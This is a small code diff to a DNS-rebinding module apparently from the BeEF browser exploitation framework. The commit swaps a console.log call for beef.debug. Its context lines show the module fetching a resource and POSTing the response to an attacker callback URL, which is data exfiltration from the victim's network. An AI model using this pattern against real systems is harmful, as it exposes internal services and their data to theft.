diff --git a/modules/network/dns_rebinding/command.js b/modules/network/dns_rebinding/command.js index 3df53c53c..0b3274985 100644 --- a/modules/network/dns_rebinding/command.js +++ b/modules/network/dns_rebinding/command.js @@ -27,7 +27,7 @@ beef.execute(function() { xhr.responseType = 'arraybuffer' xhr.onload = function(e) { var blob = new Blob([this.response], {type: this.getResponseHeader('Content-Type')}); - console.log(blob); + beef.debug(blob); xhr_cb = new XMLHttpRequest(); xhr_cb.open('POST', url_callback+'que=req&&path='+path, false); xhr_cb.send(blob);